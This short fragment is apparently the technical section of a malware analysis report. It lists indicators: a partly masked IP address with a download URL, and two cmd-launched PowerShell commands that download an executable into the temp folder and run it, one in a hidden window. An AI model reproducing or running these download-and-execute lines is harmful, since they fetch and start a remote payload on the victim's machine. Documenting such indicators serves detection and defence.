Technical Information
- http://34.##.116.148/jalv/xa1.exe as %temp%\mrioskefwne02.exe
- '34.##.116.148':80
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/xa1.exe','%temp%\mrioskefwne02.exe'); Start '%temp%\mrioskefwne02.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/xa1.exe','%temp%\mrioskefwne02.exe'); Start '%temp%\mrioskefwne02.exe'